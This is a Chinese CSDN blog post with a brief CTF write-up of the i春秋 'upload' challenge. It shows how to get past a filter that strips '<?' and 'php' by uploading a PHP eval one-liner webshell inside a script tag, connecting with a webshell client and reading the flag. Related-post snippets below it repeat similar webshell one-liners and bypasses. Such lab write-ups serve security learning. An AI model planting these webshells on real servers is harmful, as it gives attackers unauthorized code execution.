i春秋 upload

最新推荐文章于 2022-02-14 17:08:59 发布
最新推荐文章于 2022-02-14 17:08:59 发布
阅读量1.7k 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41894567/article/details/81585825
版权

 打开题目链接:

可以随意上传文件, 上传图片,txt文件,php文件等都能上传上去;

试着上传一句话;

当上传一句话木马时,上传成功后,原文件变成了如下:

把<?和php过滤掉了,再上传另一个一句话;

 <script language="PHP">
 @eval($_POST["code"]);
</script>

上传后连接菜刀;

 

由刚开始题上说,flag在flag文件中,打开flag文件就可以看到flag;

 

优呦嘿
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
暑期web10:基础的文件上传upload(i春秋)、上传绕过(实验吧)
qq_41618162的博客
08-18 2748
介于之前做了个包括文件上传步骤的题,突然想拿两个之前做过的文件上传题来回顾一下一些基础做法 首先是实验吧的上传绕过 首先我们上传最基础的一句话木马:&amp;lt;?php @eval($_POST['pass']);?&amp;gt; 反馈是‘不被允许的文件类型,仅支持上传jpg,gif,png后缀的文件’ 于是我把他的后缀改为.jpg再上传,又回显‘必须上传后缀名为php的文件才行’ 做成php...
js插件---IUpload文件上传插件(包括图片)
weixin_33881050的博客
09-05 152
js插件---IUpload文件上传插件(包括图片) 一、总结 一句话总结:上传插件找到真正上传位置的代码,这样就可以知道整个上传插件的逻辑了, 找资料还是github+官方 1、如何在js中找到真正控制上传的那段代码? a、上传的话首先考虑是不是用的ajax,结果在相关的js里面搜索'ajax'字眼(或者get,post),没找到 b、根据上面就知道不是用的jquery的aja...
i春秋Login
weixin_30701575的博客
08-07 347
打开是个很普通的登录网页 查看源码看看有没有东西 找到绿色的提示,可能是账号密码,试试 成功进来了,再右键源码,没东西。。。抓包试试,传repeater里go一下 发现一个奇怪的变量,在request中传入其他值试试 show:1 Go一下,弹出一堆flag获取信息 <?php include 'common.php'; $re...
Web-Upload[i春秋][50pt]
Laurel_60的博客
08-05 1320
> 去年写的,后面有点问题,懒得改了,要看就直接去翻我重写的另一篇吧2333 > https://laure1.github.io/2019/08/29/Summary-of-Web/#Upload
i春秋WEB之Upload
金 帛的博客
02-12 422
i春秋webWP
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
upload插件
05-11
upload的扩展插件,直接用,很方便,如果需要这一插件的可以看一下。
file-upload
02-01
在本文中,我们将深入探讨“jQuery File Upload”这个强大的Jquery图片上传组件,以及它如何帮助实现高效且用户体验良好的文件上传功能。 jQuery File Upload是一个流行的JavaScript库,专为处理文件上传而设计。它...
upload.html
01-11
before-upload 上传文件之前的钩子,参数为上传的文件,若返回 false 或者返回 Promise 且被 reject,则停止上传 function(file) - - before-remove 删除文件之前的钩子,参数为上传的文件和文件列表,若返回 false...
uploadpicture
10-20
"UploadPicture"这个项目就是利用OKHttp库实现了一个无后台接口的图片上传解决方案。OKHttp是一个高效的HTTP客户端,它提供了简单易用的API,使得网络请求变得更加便捷。下面将详细介绍如何使用OKHttp进行图片上传,...
i春秋Upload
weixin_30701575的博客
09-04 247
打开是一句普普通通的话,先查看源码,发现提示,我们需要post我们从i春秋得到的东西 得到了什么呢?不知道,去看看cookie,没什么特别的地方,再去抓包试试 找到了我们需要post的东西,不过这东西会一直刷新,并且频率很快,所以这里只能借助脚本 import base64,requests def main(): a = requests.sess...
i春秋CTF训练 Web Login
椰奶冻不安全的博客
07-04 4665
Web Login 题目内容:加油,我看好你 本题由擂主Wfox提供 题目链接请在i春秋申请 访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释 <!-- test1 test1 --> 试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有 只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show 然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码
i春秋 WEB Login
A_dmin的博客
06-13 1306
i春秋 WEB Login 一天一道CTF题目,能多不能少 打开网页,发现登录,查看源代码,发现疑似账号密码的东西~: 登录,发现什么都没有,源码也没有什么~: 既然如此就抓包吧,bp启动: 发现一个奇怪的东西——show??: 那就把这个值变成1看看有没有什么变化: 得到源码: 源码如下: <!-- <?php include 'common.php'; $requset...
i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现
AAAAAAAAAAAA66的博客
12-24 1524
今天花了点时间刷了下题目,遇到几道相对来说进阶的题目,学习一下储备一些CTF思路,这些题。。脑洞有点开。 再见CMS 昨天刚做一道 [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程_AAAAAAAAAAAA66的博客-CSDN博客 今天继续按着套路来 直接在线CMS指纹识别 百度找到payload ,都是些过了很久的漏洞了 这里简单知道是一个注入漏洞就行了,我们的目的是照着pa
el-upload组件说明汇总,实现上传、点击下载、删除功能等
热门推荐
whwhhhh的博客
02-14 1万+
<el-upload class="upload-demo" action="/admin/sys-file/upload" //文件上传路径 :headers="headers" //请求头配置信息 :file-list="fileList" //上传的文件显示列表, 格式如: [{name: 'food.jpg', url: 'https://xxx.cdn.com/xxx.jpg'}] :limit="5" /
i春秋-web-upload(文件内容读取)(“百度杯”九月场)
Sea_Sand息禅
01-16 552
提示很明显,flag在flag.php中,所以,任务就是获取flag.php的内容。 方法一:一句话+菜刀(不再叙述) 方法二:上传脚本,使脚本拥有一定权限,再输出flag 先造一个php脚本 &lt;script language="PHP"&gt; echo((file_get_contents('flag.'.'p'.'h'.'p'))); &lt;/script&gt; ...
i春秋CTF训练 Web Upload
椰奶冻不安全的博客
06-21 1287
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容:想怎么传就怎么传,就是这么任性。 tips:flag在flag.php中 链接需到ichunqiu网站申请 访问网页得到文件上传输入框 明显是文件上传漏洞 方法一:上传木马 上传小马 <?pHp @eval($_POST['123']);?> 页面显示 @eval($_POST['123']);?> 把<?和php过滤了,可以用大小写绕过php的过
i春秋web-Login(细心、注意)
Sea_Sand息禅
05-22 1297
上来就是让登陆,尝试登录页面报错,查看源码得到:<!-- test1 test1 -->,这可能就是登录的账号和密码,果然成功,进入了member.php,但是并没有得到什么有用的信息。 刷新登录后的界面,尝试抓包进行分析,在响应头处发现: 有个show=0,难道是用来显示什么信息的?在请求部分加上show: 1 试了好几个地方,只有show加在Referer前面的时候响应部分...
i春秋-ctf 文件上传
AAAAAAAAAAAA66的博客
11-08 6984
文章目录 前言 一、题目 二、解题步骤 1.我的错误思路 2.正确解题姿势 总结 前言 CTF小白,这道题思考了很久,i春秋上现在也没write up,卡了1天了,后面在buuctf找到了题解答。通过这一天让我对文件上传有了更深的理解。 目录 文章目录 一、题目进入环境。 二、解题步骤 1.我的错误思路 2.​​​​​​正确解题姿势 总结 一道普通的文件上传题,通过一天的思考我得到这类题目的思路总结。 提示:以下是本篇文章正文内容,下
NaiveUI upload
最新发布
01-19
NaiveUI是一个基于Vue.js的UI组件库,提供了丰富的组件和功能。根据提供的引用内容,NaiveUI的图片上传组件可以通过自定义请求来实现文件上传,并且可以设置最大上传数量。 以下是一个使用NaiveUI图片上传组件的示例代码: ```html <template> <dv-border-box-8 p10px> <n-upload ref="uploadRef" list-type="image-card" action="" :custom-request="Upload" :max="1"> <n-image> <template #placeholder>上传身份证头像</template> </n-image> </n-upload> </dv-border-box-8> </template> <script> export default { methods: { Upload(file) { // 自定义上传请求的逻辑 // 在这里可以处理文件上传、修改文件名等操作 } } } </script> ``` 在上述代码中,`n-upload`组件是NaiveUI提供的图片上传组件,通过设置`list-type`属性为`image-card`可以以卡片形式展示上传的图片。`custom-request`属性可以指定自定义的上传请求方法,这里使用了`Upload`方法来处理上传请求。`max`属性可以设置最大上传数量,这里设置为1表示只能上传一张图片。 你可以根据自己的需求在`Upload`方法中实现文件上传和修改文件名的逻辑。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值